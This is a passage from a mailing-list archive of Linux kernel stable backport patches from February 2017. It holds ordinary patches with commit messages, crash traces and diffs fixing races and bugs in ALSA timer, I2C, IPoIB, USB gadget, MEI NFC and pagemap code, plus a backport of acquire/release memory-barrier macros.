[<ffffffff81745e10>] ? __fsnotify_update_child_dentry_flags+0x60/0x60
[<ffffffff8143fec6>] ? kcov_ioctl+0x56/0x190
[<ffffffff81e5ada2>] ? common_file_perm+0x2e2/0x380
[<ffffffff81746b0e>] ? __fsnotify_parent+0x5e/0x2b0
[<ffffffff81d93536>] ? security_file_permission+0x86/0x1e0
[<ffffffff816728f5>] ? rw_verify_area+0xe5/0x2b0
[<ffffffff81675355>] vfs_read+0x115/0x330
[<ffffffff81676371>] SyS_read+0xd1/0x1a0
[<ffffffff816762a0>] ? vfs_write+0x4b0/0x4b0
[<ffffffff82001c2c>] ? __this_cpu_preempt_check+0x1c/0x20
[<ffffffff8150455a>] ? __context_tracking_exit.part.4+0x3a/0x1e0
[<ffffffff816762a0>] ? vfs_write+0x4b0/0x4b0
[<ffffffff81005524>] do_syscall_64+0x1c4/0x4e0
[<ffffffff810052fc>] ? syscall_return_slowpath+0x16c/0x1d0
[<ffffffff83c3276a>] entry_SYSCALL64_slow_path+0x25/0x25
==================================================================

There are a couple of problems that I can see:

- ioctl(SNDRV_TIMER_IOCTL_SELECT), which potentially sets
tu->queue/tu->tqueue to NULL on memory allocation failure, so read()
would get a NULL pointer dereference like the above splat

- the same ioctl() can free tu->queue/to->tqueue which means read()
could potentially see (and dereference) the freed pointer

We can fix both by taking the ioctl_lock mutex when dereferencing
->queue/->tqueue, since that's always held over all the ioctl() code.

Just looking at the code I find it likely that there are more problems
here such as tu->qhead pointing outside the buffer if the size is
changed concurrently using SNDRV_TIMER_IOCTL_PARAMS.

[js] unlock in fail paths

Signed-off-by: Vegard Nossum <vegard...@oracle.com>
Signed-off-by: Takashi Iwai <ti...@suse.de>
Signed-off-by: Jiri Slaby <jsl...@suse.cz>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
sound/core/timer.c | 4 ++++
1 file changed, 4 insertions(+)

diff --git a/sound/core/timer.c b/sound/core/timer.c
index 3476895..f5ddc9b 100644
--- a/sound/core/timer.c
+++ b/sound/core/timer.c
@@ -1922,19 +1922,23 @@ static ssize_t snd_timer_user_read(struct file *file, char __user *buffer,
if (err < 0)
goto _error;

+ mutex_lock(&tu->ioctl_lock);
if (tu->tread) {
if (copy_to_user(buffer, &tu->tqueue[tu->qhead++],
sizeof(struct snd_timer_tread))) {
+ mutex_unlock(&tu->ioctl_lock);
err = -EFAULT;
goto _error;
}
} else {
if (copy_to_user(buffer, &tu->queue[tu->qhead++],
sizeof(struct snd_timer_read))) {
+ mutex_unlock(&tu->ioctl_lock);
err = -EFAULT;
goto _error;
}
}
+ mutex_unlock(&tu->ioctl_lock);

tu->qhead %= tu->queue_size;

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:09 PM2/5/17
to
From: Vladimir Zapolskiy <vladimir_...@mentor.com>

commit 147b36d5b70c083cc76770c47d60b347e8eaf231 upstream.

Race condition between registering an I2C device driver and
deregistering an I2C adapter device which is assumed to manage that
I2C device may lead to a NULL pointer dereference due to the
uninitialized list head of driver clients.

The root cause of the issue is that the I2C bus may know about the
registered device driver and thus it is matched by bus_for_each_drv(),
but the list of clients is not initialized and commonly it is NULL,
because I2C device drivers define struct i2c_driver as static and
clients field is expected to be initialized by I2C core:

i2c_register_driver() i2c_del_adapter()
driver_register() ...
bus_add_driver() ...
... bus_for_each_drv(..., __process_removed_adapter)
... i2c_do_del_adapter()
... list_for_each_entry_safe(..., &driver->clients, ...)
INIT_LIST_HEAD(&driver->clients);

To solve the problem it is sufficient to do clients list head
initialization before calling driver_register().

The problem was found while using an I2C device driver with a sluggish
registration routine on a bus provided by a physically detachable I2C
master controller, but practically the oops may be reproduced under
the race between arbitraty I2C device driver registration and managing
I2C bus device removal e.g. by unbinding the latter over sysfs:

% echo 21a4000.i2c > /sys/bus/platform/drivers/imx-i2c/unbind
Unable to handle kernel NULL pointer dereference at virtual address 00000000
Internal error: Oops: 17 [#1] SMP ARM
CPU: 2 PID: 533 Comm: sh Not tainted 4.9.0-rc3+ #61
Hardware name: Freescale i.MX6 Quad/DualLite (Device Tree)
task: e5ada400 task.stack: e4936000
PC is at i2c_do_del_adapter+0x20/0xcc
LR is at __process_removed_adapter+0x14/0x1c
Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment none
Control: 10c5387d Table: 35bd004a DAC: 00000051
Process sh (pid: 533, stack limit = 0xe4936210)
Stack: (0xe4937d28 to 0xe4938000)
Backtrace:
[<c0667be0>] (i2c_do_del_adapter) from [<c0667cc0>] (__process_removed_adapter+0x14/0x1c)
[<c0667cac>] (__process_removed_adapter) from [<c0516998>] (bus_for_each_drv+0x6c/0xa0)
[<c051692c>] (bus_for_each_drv) from [<c06685ec>] (i2c_del_adapter+0xbc/0x284)
[<c0668530>] (i2c_del_adapter) from [<bf0110ec>] (i2c_imx_remove+0x44/0x164 [i2c_imx])
[<bf0110a8>] (i2c_imx_remove [i2c_imx]) from [<c051a838>] (platform_drv_remove+0x2c/0x44)
[<c051a80c>] (platform_drv_remove) from [<c05183d8>] (__device_release_driver+0x90/0x12c)
[<c0518348>] (__device_release_driver) from [<c051849c>] (device_release_driver+0x28/0x34)
[<c0518474>] (device_release_driver) from [<c0517150>] (unbind_store+0x80/0x104)
[<c05170d0>] (unbind_store) from [<c0516520>] (drv_attr_store+0x28/0x34)
[<c05164f8>] (drv_attr_store) from [<c0298acc>] (sysfs_kf_write+0x50/0x54)
[<c0298a7c>] (sysfs_kf_write) from [<c029801c>] (kernfs_fop_write+0x100/0x214)
[<c0297f1c>] (kernfs_fop_write) from [<c0220130>] (__vfs_write+0x34/0x120)
[<c02200fc>] (__vfs_write) from [<c0221088>] (vfs_write+0xa8/0x170)
[<c0220fe0>] (vfs_write) from [<c0221e74>] (SyS_write+0x4c/0xa8)
[<c0221e28>] (SyS_write) from [<c0108a20>] (ret_fast_syscall+0x0/0x1c)

Signed-off-by: Vladimir Zapolskiy <vladimir_...@mentor.com>
Signed-off-by: Wolfram Sang <w...@the-dreams.de>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/i2c/i2c-core.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/i2c/i2c-core.c b/drivers/i2c/i2c-core.c
index 9d539cb..c0e4143 100644
--- a/drivers/i2c/i2c-core.c
+++ b/drivers/i2c/i2c-core.c
@@ -1323,6 +1323,7 @@ int i2c_register_driver(struct module *owner, struct i2c_driver *driver)
/* add the driver to the list of i2c drivers in the driver core */
driver->driver.owner = owner;
driver->driver.bus = &i2c_bus_type;
+ INIT_LIST_HEAD(&driver->clients);

/* When registration returns, the driver core
* will have called probe() for all matching-but-unbound devices.
@@ -1341,7 +1342,6 @@ int i2c_register_driver(struct module *owner, struct i2c_driver *driver)

pr_debug("i2c-core: driver [%s] registered\n", driver->driver.name);

- INIT_LIST_HEAD(&driver->clients);
/* Walk the adapters that are already present */
i2c_for_each_dev(driver, __process_new_driver);

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:09 PM2/5/17
to
From: Alex Vesker <va...@mellanox.com>

commit 344bacca8cd811809fc33a249f2738ab757d327f upstream.

This fix solves a race between light flush and on the fly joins.
Light flush doesn't set the device to down and unset IPOIB_OPER_UP
flag, this means that if while flushing we have a MC join in progress
and the QP was attached to BC MGID we can have a mismatches when
re-attaching a QP to the BC MGID.

The light flush would set the broadcast group to NULL causing an on
the fly join to rejoin and reattach to the BC MCG as well as adding
the BC MGID to the multicast list. The flush process would later on
remove the BC MGID and detach it from the QP. On the next flush
the BC MGID is present in the multicast list but not found when trying
to detach it because of the previous double attach and single detach.

[18332.714265] ------------[ cut here ]------------
[18332.717775] WARNING: CPU: 6 PID: 3767 at drivers/infiniband/core/verbs.c:280 ib_dealloc_pd+0xff/0x120 [ib_core]
...
[18332.775198] Hardware name: Red Hat KVM, BIOS Bochs 01/01/2011
[18332.779411] 0000000000000000 ffff8800b50dfbb0 ffffffff813fed47 0000000000000000
[18332.784960] 0000000000000000 ffff8800b50dfbf0 ffffffff8109add1 0000011832f58300
[18332.790547] ffff880226a596c0 ffff880032482000 ffff880032482830 ffff880226a59280
[18332.796199] Call Trace:
[18332.798015] [<ffffffff813fed47>] dump_stack+0x63/0x8c
[18332.801831] [<ffffffff8109add1>] __warn+0xd1/0xf0
[18332.805403] [<ffffffff8109aebd>] warn_slowpath_null+0x1d/0x20
[18332.809706] [<ffffffffa025d90f>] ib_dealloc_pd+0xff/0x120 [ib_core]
[18332.814384] [<ffffffffa04f3d7c>] ipoib_transport_dev_cleanup+0xfc/0x1d0 [ib_ipoib]
[18332.820031] [<ffffffffa04ed648>] ipoib_ib_dev_cleanup+0x98/0x110 [ib_ipoib]
[18332.825220] [<ffffffffa04e62c8>] ipoib_dev_cleanup+0x2d8/0x550 [ib_ipoib]
[18332.830290] [<ffffffffa04e656f>] ipoib_uninit+0x2f/0x40 [ib_ipoib]
[18332.834911] [<ffffffff81772a8a>] rollback_registered_many+0x1aa/0x2c0
[18332.839741] [<ffffffff81772bd1>] rollback_registered+0x31/0x40
[18332.844091] [<ffffffff81773b18>] unregister_netdevice_queue+0x48/0x80
[18332.848880] [<ffffffffa04f489b>] ipoib_vlan_delete+0x1fb/0x290 [ib_ipoib]
[18332.853848] [<ffffffffa04df1cd>] delete_child+0x7d/0xf0 [ib_ipoib]
[18332.858474] [<ffffffff81520c08>] dev_attr_store+0x18/0x30
[18332.862510] [<ffffffff8127fe4a>] sysfs_kf_write+0x3a/0x50
[18332.866349] [<ffffffff8127f4e0>] kernfs_fop_write+0x120/0x170
[18332.870471] [<ffffffff81207198>] __vfs_write+0x28/0xe0
[18332.874152] [<ffffffff810e09bf>] ? percpu_down_read+0x1f/0x50
[18332.878274] [<ffffffff81208062>] vfs_write+0xa2/0x1a0
[18332.881896] [<ffffffff812093a6>] SyS_write+0x46/0xa0
[18332.885632] [<ffffffff810039b7>] do_syscall_64+0x57/0xb0
[18332.889709] [<ffffffff81883321>] entry_SYSCALL64_slow_path+0x25/0x25
[18332.894727] ---[ end trace 09ebbe31f831ef17 ]---

Fixes: ee1e2c82c245 ("IPoIB: Refresh paths instead of flushing them on SM change events")
Signed-off-by: Alex Vesker <va...@mellanox.com>
Signed-off-by: Leon Romanovsky <le...@kernel.org>
Signed-off-by: Doug Ledford <dled...@redhat.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/infiniband/ulp/ipoib/ipoib_ib.c | 9 +++++++++
1 file changed, 9 insertions(+)

diff --git a/drivers/infiniband/ulp/ipoib/ipoib_ib.c b/drivers/infiniband/ulp/ipoib/ipoib_ib.c
index 2cfa76f..39168d3 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_ib.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_ib.c
@@ -979,8 +979,17 @@ static void __ipoib_ib_dev_flush(struct ipoib_dev_priv *priv,
}

if (level == IPOIB_FLUSH_LIGHT) {
+ int oper_up;
ipoib_mark_paths_invalid(dev);
+ /* Set IPoIB operation as down to prevent races between:
+ * the flush flow which leaves MCG and on the fly joins
+ * which can happen during that time. mcast restart task
+ * should deal with join requests we missed.
+ */
+ oper_up = test_and_clear_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
ipoib_mcast_dev_flush(dev);
+ if (oper_up)
+ set_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
}

if (level >= IPOIB_FLUSH_NORMAL)
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:10 PM2/5/17
to
From: Dan Carpenter <dan.ca...@oracle.com>

commit f4693b08cc901912a87369c46537b94ed4084ea0 upstream.

We can't assign -EINVAL to a u16.

Fixes: 3948f0e0c999 ('usb: add Freescale QE/CPM USB peripheral controller driver')
Acked-by: Peter Chen <peter...@nxp.com>
Signed-off-by: Dan Carpenter <dan.ca...@oracle.com>
Signed-off-by: Felipe Balbi <felipe...@linux.intel.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/usb/gadget/fsl_qe_udc.c | 7 ++-----
1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/drivers/usb/gadget/fsl_qe_udc.c b/drivers/usb/gadget/fsl_qe_udc.c
index 9a7ee33..9fd2330 100644
--- a/drivers/usb/gadget/fsl_qe_udc.c
+++ b/drivers/usb/gadget/fsl_qe_udc.c
@@ -1881,11 +1881,8 @@ static int qe_get_frame(struct usb_gadget *gadget)

tmp = in_be16(&udc->usb_param->frame_n);
if (tmp & 0x8000)
- tmp = tmp & 0x07ff;
- else
- tmp = -EINVAL;
-
- return (int)tmp;
+ return tmp & 0x07ff;
+ return -EINVAL;
}

static int fsl_qe_start(struct usb_gadget *gadget,
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:10 PM2/5/17
to
From: Peter Zijlstra <pet...@infradead.org>

commit 47933ad41a86a4a9b50bed7c9b9bd2ba242aac63 upstream

A number of situations currently require the heavyweight smp_mb(),
even though there is no need to order prior stores against later
loads. Many architectures have much cheaper ways to handle these
situations, but the Linux kernel currently has no portable way
to make use of them.

This commit therefore supplies smp_load_acquire() and
smp_store_release() to remedy this situation. The new
smp_load_acquire() primitive orders the specified load against
any subsequent reads or writes, while the new smp_store_release()
primitive orders the specifed store against any prior reads or
writes. These primitives allow array-based circular FIFOs to be
implemented without an smp_mb(), and also allow a theoretical
hole in rcu_assign_pointer() to be closed at no additional
expense on most architectures.

In addition, the RCU experience transitioning from explicit
smp_read_barrier_depends() and smp_wmb() to rcu_dereference()
and rcu_assign_pointer(), respectively resulted in substantial
improvements in readability. It therefore seems likely that
replacing other explicit barriers with smp_load_acquire() and
smp_store_release() will provide similar benefits. It appears
that roughly half of the explicit barriers in core kernel code
might be so replaced.

[Changelog by PaulMck]

Reviewed-by: "Paul E. McKenney" <pau...@linux.vnet.ibm.com>
Signed-off-by: Peter Zijlstra <pet...@infradead.org>
Acked-by: Will Deacon <will....@arm.com>
Cc: Benjamin Herrenschmidt <be...@kernel.crashing.org>
Cc: Frederic Weisbecker <fwei...@gmail.com>
Cc: Mathieu Desnoyers <mathieu....@polymtl.ca>
Cc: Michael Ellerman <mic...@ellerman.id.au>
Cc: Michael Neuling <mi...@neuling.org>
Cc: Russell King <li...@arm.linux.org.uk>
Cc: Geert Uytterhoeven <ge...@linux-m68k.org>
Cc: Heiko Carstens <heiko.c...@de.ibm.com>
Cc: Linus Torvalds <torv...@linux-foundation.org>
Cc: Martin Schwidefsky <schwi...@de.ibm.com>
Cc: Victor Kaplansky <VIC...@il.ibm.com>
Cc: Tony Luck <tony...@intel.com>
Cc: Oleg Nesterov <ol...@redhat.com>
Link: http://lkml.kernel.org/r/201312131506...@infradead.org
Signed-off-by: Ingo Molnar <mi...@kernel.org>
[wt: only backported to support next patch]

Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
arch/arm/include/asm/barrier.h | 15 +++++++++++
arch/arm64/include/asm/barrier.h | 50 +++++++++++++++++++++++++++++++++++++
arch/ia64/include/asm/barrier.h | 23 +++++++++++++++++
arch/metag/include/asm/barrier.h | 15 +++++++++++
arch/mips/include/asm/barrier.h | 15 +++++++++++
arch/powerpc/include/asm/barrier.h | 21 +++++++++++++++-
arch/s390/include/asm/barrier.h | 15 +++++++++++
arch/sparc/include/asm/barrier_64.h | 15 +++++++++++
arch/x86/include/asm/barrier.h | 43 ++++++++++++++++++++++++++++++-
include/asm-generic/barrier.h | 15 +++++++++++
include/linux/compiler.h | 9 +++++++
11 files changed, 234 insertions(+), 2 deletions(-)

diff --git a/arch/arm/include/asm/barrier.h b/arch/arm/include/asm/barrier.h
index 8dcd9c7..b00ef07 100644
--- a/arch/arm/include/asm/barrier.h
+++ b/arch/arm/include/asm/barrier.h
@@ -59,6 +59,21 @@
#define smp_wmb() dmb()
#endif

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
#define read_barrier_depends() do { } while(0)
#define smp_read_barrier_depends() do { } while(0)

diff --git a/arch/arm64/include/asm/barrier.h b/arch/arm64/include/asm/barrier.h
index d4a6333..78e20ba 100644
--- a/arch/arm64/include/asm/barrier.h
+++ b/arch/arm64/include/asm/barrier.h
@@ -35,10 +35,60 @@
#define smp_mb() barrier()
#define smp_rmb() barrier()
#define smp_wmb() barrier()
+
+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
#else
+
#define smp_mb() asm volatile("dmb ish" : : : "memory")
#define smp_rmb() asm volatile("dmb ishld" : : : "memory")
#define smp_wmb() asm volatile("dmb ishst" : : : "memory")
+
+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ switch (sizeof(*p)) { \
+ case 4: \
+ asm volatile ("stlr %w1, %0" \
+ : "=Q" (*p) : "r" (v) : "memory"); \
+ break; \
+ case 8: \
+ asm volatile ("stlr %1, %0" \
+ : "=Q" (*p) : "r" (v) : "memory"); \
+ break; \
+ } \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1; \
+ compiletime_assert_atomic_type(*p); \
+ switch (sizeof(*p)) { \
+ case 4: \
+ asm volatile ("ldar %w0, %1" \
+ : "=r" (___p1) : "Q" (*p) : "memory"); \
+ break; \
+ case 8: \
+ asm volatile ("ldar %0, %1" \
+ : "=r" (___p1) : "Q" (*p) : "memory"); \
+ break; \
+ } \
+ ___p1; \
+})
+
#endif

#define read_barrier_depends() do { } while(0)
diff --git a/arch/ia64/include/asm/barrier.h b/arch/ia64/include/asm/barrier.h
index 60576e0..d0a69aa 100644
--- a/arch/ia64/include/asm/barrier.h
+++ b/arch/ia64/include/asm/barrier.h
@@ -45,14 +45,37 @@
# define smp_rmb() rmb()
# define smp_wmb() wmb()
# define smp_read_barrier_depends() read_barrier_depends()
+
#else
+
# define smp_mb() barrier()
# define smp_rmb() barrier()
# define smp_wmb() barrier()
# define smp_read_barrier_depends() do { } while(0)
+
#endif

/*
+ * IA64 GCC turns volatile stores into st.rel and volatile loads into ld.acq no
+ * need for asm trickery!
+ */
+
+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ___p1; \
+})
+
+/*
* XXX check on this ---I suspect what Linus really wants here is
* acquire vs release semantics but we can't discuss this stuff with
* Linus just yet. Grrr...
diff --git a/arch/metag/include/asm/barrier.h b/arch/metag/include/asm/barrier.h
index e355a4c..2d6f0de 100644
--- a/arch/metag/include/asm/barrier.h
+++ b/arch/metag/include/asm/barrier.h
@@ -85,4 +85,19 @@ static inline void fence(void)
#define smp_read_barrier_depends() do { } while (0)
#define set_mb(var, value) do { var = value; smp_mb(); } while (0)

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
#endif /* _ASM_METAG_BARRIER_H */
diff --git a/arch/mips/include/asm/barrier.h b/arch/mips/include/asm/barrier.h
index 314ab55..52c5b61 100644
--- a/arch/mips/include/asm/barrier.h
+++ b/arch/mips/include/asm/barrier.h
@@ -180,4 +180,19 @@
#define nudge_writes() mb()
#endif

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
#endif /* __ASM_BARRIER_H */
diff --git a/arch/powerpc/include/asm/barrier.h b/arch/powerpc/include/asm/barrier.h
index ae78225..f89da80 100644
--- a/arch/powerpc/include/asm/barrier.h
+++ b/arch/powerpc/include/asm/barrier.h
@@ -45,11 +45,15 @@
# define SMPWMB eieio
#endif

+#define __lwsync() __asm__ __volatile__ (stringify_in_c(LWSYNC) : : :"memory")
+
#define smp_mb() mb()
-#define smp_rmb() __asm__ __volatile__ (stringify_in_c(LWSYNC) : : :"memory")
+#define smp_rmb() __lwsync()
#define smp_wmb() __asm__ __volatile__ (stringify_in_c(SMPWMB) : : :"memory")
#define smp_read_barrier_depends() read_barrier_depends()
#else
+#define __lwsync() barrier()
+
#define smp_mb() barrier()
#define smp_rmb() barrier()
#define smp_wmb() barrier()
@@ -65,4 +69,19 @@
#define data_barrier(x) \
asm volatile("twi 0,%0,0; isync" : : "r" (x) : "memory");

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ __lwsync(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ __lwsync(); \
+ ___p1; \
+})
+
#endif /* _ASM_POWERPC_BARRIER_H */
diff --git a/arch/s390/include/asm/barrier.h b/arch/s390/include/asm/barrier.h
index 16760ee..578680f 100644
--- a/arch/s390/include/asm/barrier.h
+++ b/arch/s390/include/asm/barrier.h
@@ -32,4 +32,19 @@

#define set_mb(var, value) do { var = value; mb(); } while (0)

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ___p1; \
+})
+
#endif /* __ASM_BARRIER_H */
diff --git a/arch/sparc/include/asm/barrier_64.h b/arch/sparc/include/asm/barrier_64.h
index 95d4598..b5aad96 100644
--- a/arch/sparc/include/asm/barrier_64.h
+++ b/arch/sparc/include/asm/barrier_64.h
@@ -53,4 +53,19 @@ do { __asm__ __volatile__("ba,pt %%xcc, 1f\n\t" \

#define smp_read_barrier_depends() do { } while(0)

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ___p1; \
+})
+
#endif /* !(__SPARC64_BARRIER_H) */
diff --git a/arch/x86/include/asm/barrier.h b/arch/x86/include/asm/barrier.h
index c6cd358..04a4890 100644
--- a/arch/x86/include/asm/barrier.h
+++ b/arch/x86/include/asm/barrier.h
@@ -92,12 +92,53 @@
#endif
#define smp_read_barrier_depends() read_barrier_depends()
#define set_mb(var, value) do { (void)xchg(&var, value); } while (0)
-#else
+#else /* !SMP */
#define smp_mb() barrier()
#define smp_rmb() barrier()
#define smp_wmb() barrier()
#define smp_read_barrier_depends() do { } while (0)
#define set_mb(var, value) do { var = value; barrier(); } while (0)
+#endif /* SMP */
+
+#if defined(CONFIG_X86_OOSTORE) || defined(CONFIG_X86_PPRO_FENCE)
+
+/*
+ * For either of these options x86 doesn't have a strong TSO memory
+ * model and we should fall back to full barriers.
+ */
+
+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
+#else /* regular x86 TSO memory ordering */
+
+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ barrier(); \
+ ___p1; \
+})
+
#endif

/*
diff --git a/include/asm-generic/barrier.h b/include/asm-generic/barrier.h
index 639d7a4..01613b3 100644
--- a/include/asm-generic/barrier.h
+++ b/include/asm-generic/barrier.h
@@ -46,5 +46,20 @@
#define read_barrier_depends() do {} while (0)
#define smp_read_barrier_depends() do {} while (0)

+#define smp_store_release(p, v) \
+do { \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ACCESS_ONCE(*p) = (v); \
+} while (0)
+
+#define smp_load_acquire(p) \
+({ \
+ typeof(*p) ___p1 = ACCESS_ONCE(*p); \
+ compiletime_assert_atomic_type(*p); \
+ smp_mb(); \
+ ___p1; \
+})
+
#endif /* !__ASSEMBLY__ */
#endif /* __ASM_GENERIC_BARRIER_H */
diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index a2ce6f8..6977192 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -302,6 +302,11 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
# define __same_type(a, b) __builtin_types_compatible_p(typeof(a), typeof(b))
#endif

+/* Is this type a native word size -- useful for atomic operations */
+#ifndef __native_word
+# define __native_word(t) (sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
+#endif
+
/* Compile time object size, -1 for unknown */
#ifndef __compiletime_object_size
# define __compiletime_object_size(obj) -1
@@ -341,6 +346,10 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
#define compiletime_assert(condition, msg) \
_compiletime_assert(condition, msg, __compiletime_assert_, __LINE__)

+#define compiletime_assert_atomic_type(t) \
+ compiletime_assert(__native_word(t), \
+ "Need native word sized stores/loads for atomicity.")
+
/*
* Prevent the compiler from merging or refetching accesses. The compiler
* is also forbidden from reordering successive instances of ACCESS_ONCE(),
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:10 PM2/5/17
to
From: Alexander Usyskin <alexande...@intel.com>

commit 582ab27a063a506ccb55fc48afcc325342a2deba upstream.

NFC version reply size checked against only header size, not against
full message size. That may lead potentially to uninitialized memory access
in version data.

That leads to warnings when version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]: => 212:2

Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57

[js] the check is in 3.12 only once

Fixes: 59fcd7c63abf (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <alexande...@intel.com>
Signed-off-by: Tomas Winkler <tomas....@intel.com>
Signed-off-by: Jiri Slaby <jsl...@suse.cz>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/misc/mei/nfc.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/misc/mei/nfc.c b/drivers/misc/mei/nfc.c
index 4b7ea3f..1f8f856 100644
--- a/drivers/misc/mei/nfc.c
+++ b/drivers/misc/mei/nfc.c
@@ -292,7 +292,7 @@ static int mei_nfc_if_version(struct mei_nfc_dev *ndev)
return -ENOMEM;

bytes_recv = __mei_cl_recv(cl, (u8 *)reply, if_version_length);
- if (bytes_recv < 0 || bytes_recv < sizeof(struct mei_nfc_reply)) {
+ if (bytes_recv < if_version_length) {
dev_err(&dev->pdev->dev, "Could not read IF version\n");
ret = -EIO;
goto err;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:30:10 PM2/5/17
to
From: Al Viro <vi...@ZenIV.linux.org.uk>

commit e23d4159b109167126e5bcd7f3775c95de7fee47 upstream.

Switching iov_iter fault-in to multipages variants has exposed an old
bug in underlying fault_in_multipages_...(); they break if the range
passed to them wraps around. Normally access_ok() done by callers will
prevent such (and it's a guaranteed EFAULT - ERR_PTR() values fall into
such a range and they should not point to any valid objects).

However, on architectures where userland and kernel live in different
MMU contexts (e.g. s390) access_ok() is a no-op and on those a range
with a wraparound can reach fault_in_multipages_...().

Since any wraparound means EFAULT there, the fix is trivial - turn
those

while (uaddr <= end)
...
into

if (unlikely(uaddr > end))
return -EFAULT;
do
...
while (uaddr <= end);

Reported-by: Jan Stancek <jsta...@redhat.com>
Tested-by: Jan Stancek <jsta...@redhat.com>
Signed-off-by: Al Viro <vi...@zeniv.linux.org.uk>
Signed-off-by: Linus Torvalds <torv...@linux-foundation.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/linux/pagemap.h | 38 +++++++++++++++++++-------------------
1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/include/linux/pagemap.h b/include/linux/pagemap.h
index e3dea75..9497527 100644
--- a/include/linux/pagemap.h
+++ b/include/linux/pagemap.h
@@ -482,56 +482,56 @@ static inline int fault_in_pages_readable(const char __user *uaddr, int size)
*/
static inline int fault_in_multipages_writeable(char __user *uaddr, int size)
{
- int ret = 0;
